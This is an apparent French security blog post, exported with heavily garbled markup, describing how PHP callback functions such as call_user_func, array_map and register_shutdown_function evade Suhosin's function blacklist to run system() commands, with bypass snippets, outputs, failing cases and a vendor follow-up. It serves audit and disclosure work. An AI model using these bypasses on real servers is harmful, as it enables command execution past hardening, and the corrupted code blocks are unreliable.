![\"suhosin_logo_disable_php_system_exec_functions\"](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/suhosin_logo_disable_php_system_exec_functions.jpg\"){kind=logo}
<\/a><\/p>\nJe suis tomb\u00e9 hier sur un article russe de Profexer fort int\u00e9ressant, qui concerne\u00a0l\u2019outre-passement\u00a0(bypass<\/em><\/a>) de la directive “suhosin.executor.func.blacklist<\/a>” dans les nouvelles versions de PHP. Je tiens \u00e0 revenir sur ces m\u00e9thodes en \u00e9claircissant certains aspects et pour en enrichir d’autres.<\/p>\n En vue d’un bref rappel historique, le moteur PHP dispose de nombreuses directives et fonctionnalit\u00e9s pour se prot\u00e9ger d’attaques telles que l’ex\u00e9cution de code PHP arbitraire. Lors d’un pentest\/audit d’une application web PHP, l’auditeur peut \u00eatre amen\u00e9 \u00e0 exploiter une ex\u00e9cution de code sur la cible. Si l’application cible est d\u00e9ploy\u00e9e sur un environnement PHP s\u00e9curis\u00e9, certaines fonctions PHP peuvent avoir \u00e9t\u00e9 bloqu\u00e9es.<\/p>\n A l’origine, PHP fournit diverses directives dans son php.ini. On peut citer notamment :<\/p>\n Suite \u00e0 l’obsolescence du Safe_mode, un nouveau module a vu le jour dans le moteur PHP, du nom de Suhosin<\/a>. La plupart des d\u00e9ploiements de PHP actuels exploitent ce module, qui permet des r\u00e9glages de s\u00e9curit\u00e9 d’une toute autre finesse.<\/p>\n What is Suhosin?<\/p>\n Suhosin is an advanced protection system for PHP installations. It was designed to protect servers and users from known and unknown flaws in PHP applications and the PHP core. Suhosin comes in two independent parts, that can be used separately or in combination. The first part is a small patch against the PHP core, that implements a few low-level protections against bufferoverflows or format string vulnerabilities and the second part is a powerful PHP extension that implements all the other protections.<\/p>\n Unlike the PHP Hardening-Patch Suhosin is binary compatible to normal PHP installation, which means it is compatible to 3rd party binary extension like ZendOptimizer.<\/p>\n<\/blockquote>\n Lorsque Suhosin est d\u00e9ploy\u00e9 dans un environnement web PHP, sa configuration se g\u00e8re dans le fichier suhosin.ini g\u00e9n\u00e9ralement pr\u00e9sent dans\u00a0\/etc\/php5\/<YOUR PHP INSTALLED MOD>\/conf.d\/suhosin.ini, o\u00f9 votre mode d’installation PHP peut \u00eatre interne \u00e0 Apache2, en mode CLI ou CGI.<\/p>\n Le fichier de configuration suhosin.ini reprend une syntaxe de directives similaires au php.ini, et on y retrouve des directives du type :<\/p>\n [bash]&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; La directive qui nous int\u00e9resse pour cet article est “suhosin.executor.func.blacklist”. Les fonctions indiqu\u00e9es pour cette directive sont d\u00e9sactiv\u00e9es \u00e0 l’ex\u00e9cution dans les scripts PHP ainsi que dans les eval(). Notez qu’il est possible de r\u00e9gler en finesse uniquement les fonctions \u00e0 d\u00e9sactiver\/autoriser pour les eval().<\/p>\n En guise de d\u00e9monstration, voyons un cas concret avec la fonction system()<\/a>\u00a0(PHP4, PHP5), qui permet l’ex\u00e9cution de commande shell sur le serveur et affiche la sortie standard de la commande directement dans le navigateur :<\/p>\n [php]&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats :<\/strong><\/p>\n [bash]suhosin.executor.func.blacklist =&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Maintenant, si l’on d\u00e9sactive la fonction system() au travers de la directive Suhosin (reboot Apache n\u00e9cessaire) :<\/p>\n [bash]suhosin.executor.func.blacklist = system[\/bash]<\/p>\n L’ex\u00e9cution du script nous retourne :<\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; La question qui se pose alors est : “Comment bypasser<\/em> cette restriction ?<\/strong>“<\/p>\n L’id\u00e9e pour ex\u00e9cuter des commandes sur le serveur via la fonction system() sans appeler celle-ci directement, est d’utiliser d’autres fonctions natives \u00e0 PHP qui exploitent des callbacks<\/em><\/a>. Par callback, il faut entendre des pointeurs de fonctions ou des \u00e9valuations de code fonctionnel pour appeler en d\u00e9finitive notre fonction system() avec une couche d’abstraction.<\/p>\n Pour la liste des exemples qui suivent, la fonction system() est blacklist\u00e9e dans suhosin :<\/p>\n system() blacklist\u00e9e dans suhosin<\/p><\/div>\n Documentation de la fonction.<\/a><\/p>\n call_user_func\u00a0\u2014\u00a0Appelle une fonction de rappel fournie par le premier argument<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n call_user_func_array\u00a0\u2014\u00a0Appelle une fonction de rappel avec les param\u00e8tres rassembl\u00e9s en tableau<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n ob_start\u00a0\u2014\u00a0Enclenche la temporisation de sortie<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de l’objet.<\/a><\/p>\n La classe\u00a0ReflectionFunction<\/strong>\u00a0rapporte des informations sur une fonction.<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de l’objet.<\/a><\/p>\n iterator_apply\u00a0\u2014\u00a0Appelle une fonction pour tous les \u00e9l\u00e9ments d’un it\u00e9rateur<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n register_tick_function\u00a0\u2014\u00a0Enregistre une fonction ex\u00e9cut\u00e9e \u00e0 chaque tick<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n array_map\u00a0\u2014\u00a0Applique une fonction sur les \u00e9l\u00e9ments d’un tableau<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n array_walk\u00a0\u2014\u00a0Ex\u00e9cute une fonction sur chacun des \u00e9l\u00e9ments d’un tableau<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Note :<\/strong> le tableau des param\u00e8tres \u00e0 transmettre \u00e0 array_walk() doit \u00eatre d\u00e9clar\u00e9 au pr\u00e9alable ($x).<\/p>\n Documentation de la fonction.<\/a><\/p>\n array_filter\u00a0\u2014\u00a0Filtre les \u00e9l\u00e9ments d’un tableau gr\u00e2ce \u00e0 une fonction utilisateur<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n usort\u00a0\u2014\u00a0Trie un tableau en utilisant une fonction de comparaison<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n uasort\u00a0\u2014\u00a0Trie un tableau en utilisant une fonction de rappel<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n array_udiff\u00a0\u2014\u00a0Calcule la diff\u00e9rence entre deux tableaux en utilisant une fonction rappel<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n array_reduce\u00a0\u2014\u00a0R\u00e9duit it\u00e9rativement un tableau<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n array_uintersect_assoc\u00a0\u2014\u00a0Calcule l’intersection de deux tableaux avec des tests sur l’index, compare les donn\u00e9es en utilisant une fonction de rappel<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n array_uintersect_uassoc\u00a0\u2014\u00a0Calcule l’intersection de deux tableaux avec des tests sur l’index, compare les donn\u00e9es et les indexes des deux tableaux en utilisant une fonction de rappel<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n register_shutdown_function\u00a0\u2014\u00a0Enregistre une fonction de rappel pour ex\u00e9cution \u00e0 l’extinction<\/p>\n<\/blockquote>\n Code de bypass :<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.func.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Toutes les fonctions d’\u00e9valuation de code ou permettant l’utilisation de callbacks ne permettent pas toutes d’op\u00e9rer \u00e0 ces bypass. Parmi celles qui sont prot\u00e9g\u00e9es on d\u00e9nombre :<\/p>\n Documentation de l’instruction.<\/a><\/p>\n eval\u00a0\u2014\u00a0Ex\u00e9cute une cha\u00eene comme un script PHP<\/p>\n<\/blockquote>\n Code de test:<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats non-fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.eval.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Documentation de la fonction.<\/a><\/p>\n preg_replace\u00a0\u2014\u00a0Rechercher et remplacer par expression rationnelle standard<\/p>\n<\/blockquote>\n Code de test:<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats non-fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.eval.blacklist = system&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Note :<\/strong> Le flag “e” dans le pattern permet d’\u00e9valuer le code de remplacement comme pour la fonction eval().<\/p>\n Documentation de la fonction.<\/a><\/p>\n preg_replace_callback\u00a0\u2014\u00a0Rechercher et remplacer par expression rationnelle standard en utilisant une fonction de callback<\/p>\n<\/blockquote>\n Code de test:<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats non-fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.eval.blacklist =&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Note :<\/strong> Le callback est cr\u00e9\u00e9 \u00e0 la vol\u00e9 avec create_function(), qui forme un bloc de d\u00e9finition anonyme.<\/p>\n Documentation de la fonction.<\/a><\/p>\n create_function\u00a0\u2014\u00a0Cr\u00e9e une fonction anonyme<\/p>\n<\/blockquote>\n Code de test:<\/strong><\/p>\n [php]&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultats non-fonctionnel :<\/strong><\/span><\/p>\n [bash]suhosin.executor.eval.blacklist =&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; Contrairement \u00e0 ce que l’on pourrait penser, r\u00e9utiliser la directive “disable_functions” native de PHP plut\u00f4t que celle de Suhosin apporte une bien meilleure s\u00e9curit\u00e9 quant \u00e0 ces potentiels bypass.<\/p>\n Voyons dans le PoC suivant, toutes les techniques de bypass qui sont ex\u00e9cut\u00e9es \u00e0 la suite pour tenter de venir \u00e0 bout de la directive “disable_functions = system” du php.ini.<\/p>\n [php]&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt; R\u00e9sultat :<\/strong><\/p>\n D\u00e9sactivation native dans le php.ini de la fonction system()<\/p><\/div>\n La directive native de PHP applique bien une s\u00e9curit\u00e9 beaucoup plus restrictive que celle de Suhosin.<\/p>\n Si Suhosin permet des \u00e9vasions de la sorte pour une liste noire de fonctions, il pourrait \u00eatre int\u00e9ressant de creuser en ce sens pour \u00e9vader d’autres directives. Je pense notamment \u00e0 “suhosin.executor.eval.blacklist<\/a>“, ou bien m\u00eame “suhosin.executor.disable_eval<\/a>“.<\/p>\n A noter que la fonction d’ex\u00e9cution de commande shell utilis\u00e9e dans les PoC pr\u00e9c\u00e9dents est “system()”. Or il existe une multitude de m\u00e9thodes\/fonctions PHP qui permettent d’arriver \u00e0 des fins similaires. Celles-ci sont d’ailleurs r\u00e9guli\u00e8rement blacklist\u00e9es chez les h\u00e9bergeurs, et peuvent \u00eatre bypass\u00e9es avec les techniques d\u00e9velopp\u00e9es plus haut. Pour n’en citer que quelques-unes :<\/p>\n Idem, d’autres fonctions permettent d’exploiter des callbacks. Des fonctions natives de PHP mais aussi parmi les objets et classes. Des pistes pour d’autres PoC pourraient concerner les fonctions uksort<\/a>, array_diff_ukey<\/a>, array_intersect_uassoc<\/a>, array_intersect_ukey<\/a>, etc.<\/p>\n Les techniques d’\u00e9vasions pr\u00e9c\u00e9dentes de la liste noire Suhosin n’est bien \u00e9videmment pas exhaustive, d’autres m\u00e9thodes plus ou moins exotiques peuvent \u00eatre utilis\u00e9es. Si vous connaissez de telles m\u00e9thodes, n’h\u00e9sitez pas \u00e0 contribuer \u00e0 cet article en me contactant<\/a>.<\/p>\n 09 avril 2013 :<\/strong><\/p>\n Apr\u00e8s un \u00e9change de mail avec Stefan Esser du site officiel du module de s\u00e9curit\u00e9, il s’av\u00e8re que cette faiblesse n’est pas propre \u00e0 Suhosin mais est intrins\u00e8que \u00e0 PHP. Ce probl\u00e8me de bypass est connu des d\u00e9veloppeurs depuis environs une ann\u00e9e. Il provient d’une difficult\u00e9 du moteur PHP d’appeler le hook<\/em> s\u00e9curis\u00e9 des appels de fonctions internes (callback<\/em>). D’apr\u00e8s Stefan Esser, cette faiblesse est r\u00e9solue dans la version 5.5 de PHP qui n’est pour l’heure qu’au stade de beta.<\/p>\n A noter que le projet Suhosin est quelque peu “endormi” en ce moment. Une reprise est pr\u00e9vue \u00e0 partir de mai 2013.<\/p>\n <\/p>","protected":false},"excerpt":{"rendered":" Je suis tomb\u00e9 hier sur un article russe de Profexer fort int\u00e9ressant, qui concerne\u00a0l\u2019outre-passement\u00a0(bypass) de la directive “suhosin.executor.func.blacklist” dans les […]<\/p>\n","protected":false},"author":1337,"featured_media":1150,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[529,16,14],"tags":[324,323,322,321,317,17,319,320,201,325,318,316,32],"class_list":["post-737","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-privilege-escalation","category-prog-and-dev","category-vuln-exploit-poc","tag-bypass","tag-callback","tag-eval","tag-exec","tag-functions-blacklist","tag-php","tag-popen","tag-proc_open","tag-remote-command-execution","tag-safe-mode","tag-shell_exec","tag-suhosin","tag-system"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/737","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=737"}],"version-history":[{"count":31,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/737\/revisions"}],"predecessor-version":[{"id":1692,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/737\/revisions\/1692"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/1150"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=737"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=737"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=737"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}Safe_mode, disable_functions & Suhosin<\/h2>\n
\n
\n
Suhosin.ini et functions\u00a0blacklist<\/h2>\n
\n&amp;amp;amp;lt;p&amp;amp;amp;gt;; Executor Options&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.max_depth = 0&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.include.max_traversal = 0&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.include.whitelist =&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.include.blacklist =&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.include.allow_writable_files = on&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.func.whitelist =&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.func.blacklist =&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.eval.whitelist =&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.eval.blacklist =&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.disable_eval = off&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.disable_emodifier = off&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n;suhosin.executor.allow_symlink = off&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt;[\/bash]<\/p>\n
\n&amp;amp;amp;lt;p&amp;amp;amp;gt;&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;system(‘uname -a’);&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n system(&amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n?&amp;amp;amp;amp;gt;&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt;[\/php]<\/p>\n
\nsystem(‘uname -a’);&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\nLinux 2.6.38-16-generic-pae #67-Ubuntu SMP Thu Sep 6 18:18:02 UTC 2012 i686 GNU\/Linux[\/bash]<\/p>\n
\nsystem(‘uname -a’);&amp;amp;amp;lt;\/p&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n&amp;amp;amp;lt;p&amp;amp;amp;gt;PHP Warning: \u00a0system() has been disabled for security reasons in \/var\/www\/x.php on line 4[\/bash]<\/p>\nBypass de la liste noire des fonctions Suhosin<\/h2>\n
<\/a>call_user_func (PHP4, PHP5)<\/h3>\n
\n
\n&amp;amp;amp;amp;lt;?php&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n $cmd = &amp;amp;amp;amp;quot;uname -a&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n echo &amp;amp;amp;amp;quot;suhosin.executor.func.blacklist = &amp;amp;amp;amp;quot; . ini_get(&amp;amp;amp;amp;quot;suhosin.executor.func.blacklist&amp;amp;amp;amp;quot;) . &amp;amp;amp;amp;quot;&amp;amp;amp;amp;lt;br \/&amp;amp;amp;amp;gt;&amp;amp;amp;amp;quot;;&amp;amp;amp;lt;br \/&amp;amp;amp;gt;&amp;amp;lt;br \/&amp;amp;gt;&amp;lt;br \/&amp;gt;&lt;br \/&gt;
